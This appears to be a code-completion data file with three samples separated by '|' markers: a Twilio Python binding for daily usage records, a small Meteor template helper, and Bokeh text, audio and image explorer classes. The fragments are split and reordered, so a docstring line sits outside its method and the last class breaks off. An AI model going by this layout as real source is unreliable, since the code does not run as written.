from twilio.base.page import Page
class DailyList(ListResource):
def __init__(self, version, account_sid):
"""
Initialize the DailyList
:param Version version: Version that contains the resource
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyList
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyList
"""
super(DailyList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, }
self._uri = '/Accounts/{account_sid}/Usage/Records/Daily.json'.format(**self._solution)
def stream(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Streams DailyInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param DailyInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.daily.DailyInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'])
def list(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Lists DailyInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param DailyInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.daily.DailyInstance]
"""
return list(self.stream(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
limit=limit,
page_size=page_size,
))
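# Hedged usage sketch (not part of the generated binding): listing daily usage records via
# a configured twilio.rest.Client; the `client` variable, the category value and the dates
# below are illustrative assumptions.
#
#   from datetime import date
#   records = client.usage.records.daily.list(
#       category='sms', start_date=date(2021, 1, 1), limit=20)
#   for record in records:
#       print(record.category, record.usage, record.usage_unit, record.price, record.price_unit)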
def page(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of DailyInstance records from the API.
Request is executed immediately
:param DailyInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date | :param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
"""
data = values.of({
'Category': category,
'StartDate': serialize.iso8601_date(start_date),
'EndDate': serialize.iso8601_date(end_date),
'IncludeSubaccounts': include_subaccounts,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(method='GET', uri=self._uri, params=data, )
return DailyPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of DailyInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return DailyPage(self._version, response, self._solution)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.DailyList>'
class DailyPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the DailyPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyPage
"""
super(DailyPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of DailyInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
"""
return DailyInstance(self._version, payload, account_sid=self._solution['account_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.DailyPage>'
class DailyInstance(InstanceResource):
class Category(object):
A2P_REGISTRATION_FEES = "a2p-registration-fees"
AGENT_CONFERENCE = "agent-conference"
ANSWERING_MACHINE_DETECTION = "answering-machine-detection"
AUTHY_AUTHENTICATIONS = "authy-authentications"
AUTHY_CALLS_OUTBOUND = "authy-calls-outbound"
AUTHY_MONTHLY_FEES = "authy-monthly-fees"
AUTHY_PHONE_INTELLIGENCE = "authy-phone-intelligence"
AUTHY_PHONE_VERIFICATIONS = "authy-phone-verifications"
AUTHY_SMS_OUTBOUND = "authy-sms-outbound"
CALL_PROGESS_EVENTS = "call-progess-events"
CALLERIDLOOKUPS = "calleridlookups"
CALLS = "calls"
CALLS_CLIENT = "calls-client"
CALLS_GLOBALCONFERENCE = "calls-globalconference"
CALLS_INBOUND = "calls-inbound"
CALLS_INBOUND_LOCAL = "calls-inbound-local"
CALLS_INBOUND_MOBILE = "calls-inbound-mobile"
CALLS_INBOUND_TOLLFREE = "calls-inbound-tollfree"
CALLS_OUTBOUND = "calls-outbound"
CALLS_PAY_VERB_TRANSACTIONS = "calls-pay-verb-transactions"
CALLS_RECORDINGS = "calls-recordings"
CALLS_SIP = "calls-sip"
CALLS_SIP_INBOUND = "calls-sip-inbound"
CALLS_SIP_OUTBOUND = "calls-sip-outbound"
CALLS_TRANSFERS = "calls-transfers"
CARRIER_LOOKUPS = "carrier-lookups"
CONVERSATIONS = "conversations"
CONVERSATIONS_API_REQUESTS = "conversations-api-requests"
CONVERSATIONS_CONVERSATION_EVENTS = "conversations-conversation-events"
CONVERSATIONS_ENDPOINT_CONNECTIVITY = "conversations-endpoint-connectivity"
CONVERSATIONS_EVENTS = "conversations-events"
CONVERSATIONS_PARTICIPANT_EVENTS = "conversations-participant-events"
CONVERSATIONS_PARTICIPANTS = "conversations-participants"
CPS = "cps"
FLEX_USAGE = "flex-usage"
FRAUD_LOOKUPS = "fraud-lookups"
GROUP_ROOMS = "group-rooms"
GROUP_ROOMS_DATA_TRACK = "group-rooms-data-track"
GROUP_ROOMS_ENCRYPTED_MEDIA_RECORDED = "group-rooms-encrypted-media-recorded"
GROUP_ROOMS_MEDIA_DOWNLOADED = "group-rooms-media-downloaded"
GROUP_ROOMS_MEDIA_RECORDED = "group-rooms-media-recorded"
GROUP_ROOMS_MEDIA_ROUTED = "group-rooms-media-routed"
GROUP_ROOMS_MEDIA_STORED = "group-rooms-media-stored"
GROUP_ROOMS_PARTICIPANT_MINUTES = "group-rooms-participant-minutes"
GROUP_ROOMS_RECORDED_MINUTES = "group-rooms-recorded-minutes"
IMP_V1_USAGE = "imp-v1-usage"
LOOKUPS = "lookups"
MARKETPLACE = "marketplace"
MARKETPLACE_ALGORITHMIA_NAMED_ENTITY_RECOGNITION = "marketplace-algorithmia-named-entity-recognition"
MARKETPLACE_CADENCE_TRANSCRIPTION = "marketplace-cadence-transcription"
MARKETPLACE_CADENCE_TRANSLATION = "marketplace-cadence-translation"
MARKETPLACE_CAPIO_SPEECH_TO_TEXT = "marketplace-capio-speech-to-text"
MARKETPLACE_CONVRIZA_ABABA = "marketplace-convriza-ababa"
MARKETPLACE_DEEPGRAM_PHRASE_DETECTOR = "marketplace-deepgram-phrase-detector"
MARKETPLACE_DIGITAL_SEGMENT_BUSINESS_INFO = "marketplace-digital-segment-business-info"
MARKETPLACE_FACEBOOK_OFFLINE_CONVERSIONS = "marketplace-facebook-offline-conversions"
MARKETPLACE_GOOGLE_SPEECH_TO_TEXT = "marketplace-google-speech-to-text"
MARKETPLACE_IBM_WATSON_MESSAGE_INSIGHTS = "marketplace-ibm-watson-message-insights"
MARKETPLACE_IBM_WATSON_MESSAGE_SENTIMENT = "marketplace-ibm-watson-message-sentiment"
MARKETPLACE_IBM_WATSON_RECORDING_ANALYSIS = "marketplace-ibm-watson-recording-analysis"
MARKETPLACE_IBM_WATSON_TONE_ANALYZER = "marketplace-ibm-watson-tone-analyzer"
MARKETPLACE_ICEHOOK_SYSTEMS_SCOUT = "marketplace-icehook-systems-scout"
MARKETPLACE_INFOGROUP_DATAAXLE_BIZINFO = "marketplace-infogroup-dataaxle-bizinfo"
MARKETPLACE_KEEN_IO_CONTACT_CENTER_ANALYTICS = "marketplace-keen-io-contact-center-analytics"
MARKETPLACE_MARCHEX_CLEANCALL = "marketplace-marchex-cleancall"
MARKETPLACE_MARCHEX_SENTIMENT_ANALYSIS_FOR_SMS = "marketplace-marchex-sentiment-analysis-for-sms"
MARKETPLACE_MARKETPLACE_NEXTCALLER_SOCIAL_ID = "marketplace-marketplace-nextcaller-social-id"
MARKETPLACE_MOBILE_COMMONS_OPT_OUT_CLASSIFIER = "marketplace-mobile-commons-opt-out-classifier"
MARKETPLACE_NEXIWAVE_VOICEMAIL_TO_TEXT = "marketplace-nexiwave-voicemail-to-text"
MARKETPLACE_NEXTCALLER_ADVANCED_CALLER_IDENTIFICATION = "marketplace-nextcaller-advanced-caller-identification"
MARKETPLACE_NOMOROBO_SPAM_SCORE = "marketplace-nomorobo-spam-score"
MARKETPLACE_PAYFONE_TCPA_COMPLIANCE = "marketplace-payfone-tcpa-compliance"
MARKETPLACE_REMEETING_AUTOMATIC_SPEECH_RECOGNITION = "marketplace-remeeting-automatic-speech-recognition"
MARKETPLACE_TCPA_DEFENSE_SOLUTIONS_BLACKLIST_FEED = "marketplace-tcpa-defense-solutions-blacklist-feed"
MARKETPLACE_TELO_OPENCNAM = "marketplace-telo-opencnam"
MARKETPLACE_TRUECNAM_TRUE_SPAM = "marketplace-truecnam-true-spam"
MARKETPLACE_TWILIO_CALLER_NAME_LOOKUP_US = "marketplace-twilio-caller-name-lookup-us"
MARKETPLACE_TWILIO_CARRIER_INFORMATION_LOOKUP = "marketplace-twilio-carrier-information-lookup"
MARKETPLACE_VOICEBASE_PCI = "marketplace-voicebase-pci"
MARKETPLACE_VOICEBASE_TRANSCRIPTION = "marketplace-voicebase-transcription"
MARKETPLACE_VOICEBASE_TRANSCRIPTION_CUSTOM_VOCABULARY = "marketplace-voicebase-transcription-custom-vocabulary"
MARKETPLACE_WHITEPAGES_PRO_CALLER_IDENTIFICATION = "marketplace-whitepages-pro-caller-identification"
MARKETPLACE_WHITEPAGES_PRO_PHONE_INTELLIGENCE = "marketplace-whitepages-pro-phone-intelligence"
MARKETPLACE_WHITEPAGES_PRO_PHONE_REPUTATION = "marketplace-whitepages-pro-phone-reputation"
MARKETPLACE_WOLFARM_SPOKEN_RESULTS = "marketplace-wolfarm-spoken-results"
MARKETPLACE_WOLFRAM_SHORT_ANSWER = "marketplace-wolfram-short-answer"
MARKETPLACE_YTICA_CONTACT_CENTER_REPORTING_ANALYTICS = "marketplace-ytica-contact-center-reporting-analytics"
MEDIASTORAGE = "mediastorage"
MMS = "mms"
MMS_INBOUND = "mms-inbound"
MMS_INBOUND_LONGCODE = "mms-inbound-longcode"
MMS_INBOUND_SHORTCODE = "mms-inbound-shortcode"
MMS_MESSAGES_CARRIERFEES = "mms-messages-carrierfees"
MMS_OUTBOUND = "mms-outbound"
MMS_OUTBOUND_LONGCODE = "mms-outbound-longcode"
MMS_OUTBOUND_SHORTCODE = "mms-outbound-shortcode"
MONITOR_READS = "monitor-reads"
MONITOR_STORAGE = "monitor-storage"
MONITOR_WRITES = "monitor-writes"
NOTIFY = "notify"
NOTIFY_ACTIONS_ATTEMPTS = "notify-actions-attempts"
NOTIFY_CHANNELS = "notify-channels"
NUMBER_FORMAT_LOOKUPS = "number-format-lookups"
PCHAT = "pchat"
PCHAT_USERS = "pchat-users"
PEER_TO_PEER_ROOMS_PARTICIPANT_MINUTES = "peer-to-peer-rooms-participant-minutes"
PFAX = "pfax"
PFAX_MINUTES = "pfax-minutes"
PFAX_MINUTES_INBOUND = "pfax-minutes-inbound"
PFAX_MINUTES_OUTBOUND = "pfax-minutes-outbound"
PFAX_PAGES = "pfax-pages"
PHONENUMBERS = "phonenumbers"
PHONENUMBERS_CPS = "phonenumbers-cps"
PHONENUMBERS_EMERGENCY = "phonenumbers-emergency"
PHONENUMBERS_LOCAL = "phonenumbers-local"
PHONENUMBERS_MOBILE = "phonenumbers-mobile"
PHONENUMBERS_SETUPS = "phonenumbers-setups"
PHONENUMBERS_TOLLFREE = "phonenumbers-tollfree"
PREMIUMSUPPORT = "premiumsupport"
PROXY = "proxy"
PROXY_ACTIVE_SESSIONS = "proxy-active-sessions"
PSTNCONNECTIVITY = "pstnconnectivity"
PV = "pv"
PV_COMPOSITION_MEDIA_DOWNLOADED = "pv-composition-media-downloaded"
PV_COMPOSITION_MEDIA_ENCRYPTED = "pv-composition-media-encrypted"
PV_COMPOSITION_MEDIA_STORED = "pv-composition-media-stored"
PV_COMPOSITION_MINUTES = "pv-composition-minutes"
PV_RECORDING_COMPOSITIONS = "pv-recording-compositions"
PV_ROOM_PARTICIPANTS = "pv-room-participants"
PV_ROOM_PARTICIPANTS_AU1 = "pv-room-participants-au1"
PV_ROOM_PARTICIPANTS_BR1 = "pv-room-participants-br1"
PV_ROOM_PARTICIPANTS_IE1 = "pv-room-participants-ie1"
PV_ROOM_PARTICIPANTS_JP1 = "pv-room-participants-jp1"
PV_ROOM_PARTICIPANTS_SG1 = "pv-room-participants-sg1"
PV_ROOM_PARTICIPANTS_US1 = "pv-room-participants-us1"
PV_ROOM_PARTICIPANTS_US2 = "pv-room-participants-us2"
PV_ROOMS = "pv-rooms"
PV_SIP_ENDPOINT_REGISTRATIONS = "pv-sip-endpoint-registrations"
RECORDINGS = "recordings"
RECORDINGSTORAGE = "recordingstorage"
ROOMS_GROUP_BANDWIDTH = "rooms-group-bandwidth"
ROOMS_GROUP_MINUTES = "rooms-group-minutes"
ROOMS_PEER_TO_PEER_MINUTES = "rooms-peer-to-peer-minutes"
SHORTCODES = "shortcodes"
SHORTCODES_CUSTOMEROWNED = "shortcodes-customerowned"
SHORTCODES_MMS_ENABLEMENT = "shortcodes-mms-enablement"
SHORTCODES_MPS = "shortcodes-mps"
SHORTCODES_RANDOM = "shortcodes-random"
SHORTCODES_UK = "shortcodes-uk"
SHORTCODES_VANITY = "shortcodes-vanity"
SMALL_GROUP_ROOMS = "small-group-rooms"
SMALL_GROUP_ROOMS_DATA_TRACK = "small-group-rooms-data-track"
SMALL_GROUP_ROOMS_PARTICIPANT_MINUTES = "small-group-rooms-participant-minutes"
SMS = "sms"
SMS_INBOUND = "sms-inbound"
SMS_INBOUND_LONGCODE = "sms-inbound-longcode"
SMS_INBOUND_SHORTCODE = "sms-inbound-shortcode"
SMS_MESSAGES_CARRIERFEES = "sms-messages-carrierfees"
SMS_MESSAGES_FEATURES = "sms-messages-features"
SMS_MESSAGES_FEATURES_SENDERID = "sms-messages-features-senderid"
SMS_OUTBOUND = "sms-outbound"
SMS_OUTBOUND_CONTENT_INSPECTION = "sms-outbound-content-inspection"
SMS_OUTBOUND_LONGCODE = "sms-outbound-longcode"
SMS_OUTBOUND_SHORTCODE = "sms-outbound-shortcode"
SPEECH_RECOGNITION = "speech-recognition"
STUDIO_ENGAGEMENTS = "studio-engagements"
SYNC = "sync"
SYNC_ACTIONS = "sync-actions"
SYNC_ENDPOINT_HOURS = "sync-endpoint-hours"
SYNC_ENDPOINT_HOURS_ABOVE_DAILY_CAP = "sync-endpoint-hours-above-daily-cap"
TASKROUTER_TASKS = "taskrouter-tasks"
TOTALPRICE = "totalprice"
TRANSCRIPTIONS = "transcriptions"
TRUNKING_CPS = "trunking-cps"
TRUNKING_EMERGENCY_CALLS = "trunking-emergency-calls"
TRUNKING_ORIGINATION = "trunking-origination"
TRUNKING_ORIGINATION_LOCAL = "trunking-origination-local"
TRUNKING_ORIGINATION_MOBILE = "trunking-origination-mobile"
TRUNKING_ORIGINATION_TOLLFREE = "trunking-origination-tollfree"
TRUNKING_RECORDINGS = "trunking-recordings"
TRUNKING_SECURE = "trunking-secure"
TRUNKING_TERMINATION = "trunking-termination"
TURNMEGABYTES = "turnmegabytes"
TURNMEGABYTES_AUSTRALIA = "turnmegabytes-australia"
TURNMEGABYTES_BRASIL = "turnmegabytes-brasil"
TURNMEGABYTES_GERMANY = "turnmegabytes-germany"
TURNMEGABYTES_INDIA = "turnmegabytes-india"
TURNMEGABYTES_IRELAND = "turnmegabytes-ireland"
TURNMEGABYTES_JAPAN = "turnmegabytes-japan"
TURNMEGABYTES_SINGAPORE = "turnmegabytes-singapore"
TURNMEGABYTES_USEAST = "turnmegabytes-useast"
TURNMEGABYTES_USWEST = "turnmegabytes-uswest"
TWILIO_INTERCONNECT = "twilio-interconnect"
VERIFY_PUSH = "verify-push"
VIDEO_RECORDINGS = "video-recordings"
VOICE_INSIGHTS = "voice-insights"
VOICE_INSIGHTS_CLIENT_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-client-insights-on-demand-minute"
VOICE_INSIGHTS_PTSN_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-ptsn-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_INTERFACE_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-interface-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_TRUNKING_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-trunking-insights-on-demand-minute"
WIRELESS = "wireless"
WIRELESS_ORDERS = "wireless-orders"
WIRELESS_ORDERS_ARTWORK = "wireless-orders-artwork"
WIRELESS_ORDERS_BULK = "wireless-orders-bulk"
WIRELESS_ORDERS_ESIM = "wireless-orders-esim"
WIRELESS_ORDERS_STARTER = "wireless-orders-starter"
WIRELESS_USAGE = "wireless-usage"
WIRELESS_USAGE_COMMANDS = "wireless-usage-commands"
WIRELESS_USAGE_COMMANDS_AFRICA = "wireless-usage-commands-africa"
WIRELESS_USAGE_COMMANDS_ASIA = "wireless-usage-commands-asia"
WIRELESS_USAGE_COMMANDS_CENTRALANDSOUTHAMERICA = "wireless-usage-commands-centralandsouthamerica"
WIRELESS_USAGE_COMMANDS_EUROPE = "wireless-usage-commands-europe"
WIRELESS_USAGE_COMMANDS_HOME = "wireless-usage-commands-home"
WIRELESS_USAGE_COMMANDS_NORTHAMERICA = "wireless-usage-commands-northamerica"
WIRELESS_USAGE_COMMANDS_OCEANIA = "wireless-usage-commands-oceania"
WIRELESS_USAGE_COMMANDS_ROAMING = "wireless-usage-commands-roaming"
WIRELESS_USAGE_DATA = "wireless-usage-data"
WIRELESS_USAGE_DATA_AFRICA = "wireless-usage-data-africa"
WIRELESS_USAGE_DATA_ASIA = "wireless-usage-data-asia"
WIRELESS_USAGE_DATA_CENTRALANDSOUTHAMERICA = "wireless-usage-data-centralandsouthamerica"
WIRELESS_USAGE_DATA_CUSTOM_ADDITIONALMB = "wireless-usage-data-custom-additionalmb"
WIRELESS_USAGE_DATA_CUSTOM_FIRST5MB = "wireless-usage-data-custom-first5mb"
WIRELESS_USAGE_DATA_DOMESTIC_ROAMING = "wireless-usage-data-domestic-roaming"
WIRELESS_USAGE_DATA_EUROPE = "wireless-usage-data-europe"
WIRELESS_USAGE_DATA_INDIVIDUAL_ADDITIONALGB = "wireless-usage-data-individual-additionalgb"
WIRELESS_USAGE_DATA_INDIVIDUAL_FIRSTGB = "wireless-usage-data-individual-firstgb"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_CANADA = "wireless-usage-data-international-roaming-canada"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_INDIA = "wireless-usage-data-international-roaming-india"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_MEXICO = "wireless-usage-data-international-roaming-mexico"
WIRELESS_USAGE_DATA_NORTHAMERICA = "wireless-usage-data-northamerica"
WIRELESS_USAGE_DATA_OCEANIA = "wireless-usage-data-oceania"
WIRELESS_USAGE_DATA_POOLED = "wireless-usage-data-pooled"
WIRELESS_USAGE_DATA_POOLED_DOWNLINK = "wireless-usage-data-pooled-downlink"
WIRELESS_USAGE_DATA_POOLED_UPLINK = "wireless-usage-data-pooled-uplink"
WIRELESS_USAGE_MRC = "wireless-usage-mrc"
WIRELESS_USAGE_MRC_CUSTOM = "wireless-usage-mrc-custom"
WIRELESS_USAGE_MRC_INDIVIDUAL = "wireless-usage-mrc-individual"
WIRELESS_USAGE_MRC_POOLED = "wireless-usage-mrc-pooled"
WIRELESS_USAGE_MRC_SUSPENDED = "wireless-usage-mrc-suspended"
WIRELESS_USAGE_SMS = "wireless-usage-sms"
WIRELESS_USAGE_VOICE = "wireless-usage-voice"
def __init__(self, version, payload, account_sid):
"""
Initialize the DailyInstance
:returns: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
:rtype: twilio.rest.api.v2010.account.usage.record.daily.DailyInstance
"""
super(DailyInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload.get('account_sid'),
'api_version': payload.get('api_version'),
'as_of': payload.get('as_of'),
'category': payload.get('category'),
'count': payload.get('count'),
'count_unit': payload.get('count_unit'),
'description': payload.get('description'),
'end_date': deserialize.iso8601_date(payload.get('end_date')),
'price': deserialize.decimal(payload.get('price')),
'price_unit': payload.get('price_unit'),
'start_date': deserialize.iso8601_date(payload.get('start_date')),
'subresource_uris': payload.get('subresource_uris'),
'uri': payload.get('uri'),
'usage': payload.get('usage'),
'usage_unit': payload.get('usage_unit'),
}
# Context
self._context = None
self._solution = {'account_sid': account_sid, }
@property
def account_sid(self):
"""
:returns: The SID of the Account accrued the usage
:rtype: unicode
"""
return self._properties['account_sid']
@property
def api_version(self):
"""
:returns: The API version used to create the resource
:rtype: unicode
"""
return self._properties['api_version']
@property
def as_of(self):
"""
:returns: Usage records up to date as of this timestamp
:rtype: unicode
"""
return self._properties['as_of']
@property
def category(self):
"""
:returns: The category of usage
:rtype: DailyInstance.Category
"""
return self._properties['category']
@property
def count(self):
"""
:returns: The number of usage events
:rtype: unicode
"""
return self._properties['count']
@property
def count_unit(self):
"""
:returns: The units in which count is measured
:rtype: unicode
"""
return self._properties['count_unit']
@property
def description(self):
"""
:returns: A plain-language description of the usage category
:rtype: unicode
"""
return self._properties['description']
@property
def end_date(self):
"""
:returns: The last date for which usage is included in the UsageRecord
:rtype: date
"""
return self._properties['end_date']
@property
def price(self):
"""
:returns: The total price of the usage
:rtype: unicode
"""
return self._properties['price']
@property
def price_unit(self):
"""
:returns: The currency in which `price` is measured
:rtype: unicode
"""
return self._properties['price_unit']
@property
def start_date(self):
"""
:returns: The first date for which usage is included in this UsageRecord
:rtype: date
"""
return self._properties['start_date']
@property
def subresource_uris(self):
"""
:returns: A list of related resources identified by their relative URIs
:rtype: unicode
"""
return self._properties['subresource_uris']
@property
def uri(self):
"""
:returns: The URI of the resource, relative to `https://api.twilio.com`
:rtype: unicode
"""
return self._properties['uri']
@property
def usage(self):
"""
:returns: The amount of usage
:rtype: unicode
"""
return self._properties['usage']
@property
def usage_unit(self):
"""
:returns: The units in which usage is measured
:rtype: unicode
"""
return self._properties['usage_unit']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.DailyInstance>' | :param date end_date: Only include usage that occurred on or before this date |
documents.js | Template.documents.helpers({
documents: function(){
var getDocuments = Documents.find( {}, { fields: { "title": 1 } } ); | if ( getDocuments ) {
return getDocuments;
}
}
}); | |
specialization.py | """
???+ note "Child classes which are `functionality`-by-`feature` products."
This could resemble template specialization in C++.
"""
from .functionality import (
BokehDataFinder,
BokehDataAnnotator,
BokehSoftLabelExplorer,
BokehMarginExplorer,
BokehSnorkelExplorer,
)
from .feature import BokehForText, BokehForAudio, BokehForImage
from bokeh.layouts import column, row
from deprecated import deprecated
class BokehTextFinder(BokehDataFinder, BokehForText):
"""
???+ note "The text flavor of `BokehDataFinder`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataFinder.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(column(self.search_pos, self.search_neg), self.search_filter_box),
row(self.data_key_button_group),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehTextAnnotator(BokehDataAnnotator, BokehForText):
"""
???+ note "The text flavor of `BokehDataAnnotator`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataAnnotator.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.search_pos, self.search_neg),
row(self.data_key_button_group),
row(self.annotator_input, self.annotator_apply, self.annotator_export),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehTextSoftLabel(BokehSoftLabelExplorer, BokehForText):
"""
???+ note "The text flavor of `BokehSoftLabelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSoftLabelExplorer.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.search_pos, self.search_neg),
row(self.data_key_button_group),
row(self.score_filter),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehTextMargin(BokehMarginExplorer, BokehForText):
"""
???+ note "The text flavor of `BokehMarginExplorer`.""
"""
TOOLTIP_KWARGS = BokehForText.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForText.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehMarginExplorer.SUBSET_GLYPH_KWARGS
class BokehTextSnorkel(BokehSnorkelExplorer, BokehForText):
|
class BokehAudioFinder(BokehDataFinder, BokehForAudio):
"""
???+ note "The audio flavor of `BokehDataFinder`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataFinder.SUBSET_GLYPH_KWARGS
class BokehAudioAnnotator(BokehDataAnnotator, BokehForAudio):
"""
???+ note "The audio flavor of `BokehDataAnnotator`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataAnnotator.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.annotator_input, self.annotator_apply, self.annotator_export),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehAudioSoftLabel(BokehSoftLabelExplorer, BokehForAudio):
"""
???+ note "The audio flavor of `BokehSoftLabelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSoftLabelExplorer.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
row(self.score_filter),
row(*self._dynamic_widgets.values()),
)
return column(*layout_rows)
class BokehAudioMargin(BokehMarginExplorer, BokehForAudio):
"""
???+ note "The audio flavor of `BokehMarginExplorer`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehMarginExplorer.SUBSET_GLYPH_KWARGS
class BokehAudioSnorkel(BokehSnorkelExplorer, BokehForAudio):
"""
???+ note "The audio flavor of `BokehSnorkelExplorer`.""
"""
TOOLTIP_KWARGS = BokehForAudio.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForAudio.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehSnorkelExplorer.SUBSET_GLYPH_KWARGS
class BokehImageFinder(BokehDataFinder, BokehForImage):
"""
???+ note "The image flavor of `BokehDataFinder`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataFinder.SUBSET_GLYPH_KWARGS
class BokehImageAnnotator(BokehDataAnnotator, BokehForImage):
"""
???+ note "The image flavor of `BokehDataAnnotator`.""
"""
TOOLTIP_KWARGS = BokehForImage.TOOLTIP_KWARGS
MANDATORY_COLUMNS = BokehForImage.MANDATORY_COLUMNS
SUBSET_GLYPH_KWARGS = BokehDataAnnotator.SUBSET_GLYPH_KWARGS
def _layout_widgets(self):
"""Define the layout of widgets."""
layout_rows = (
row(self.data_key_button_group),
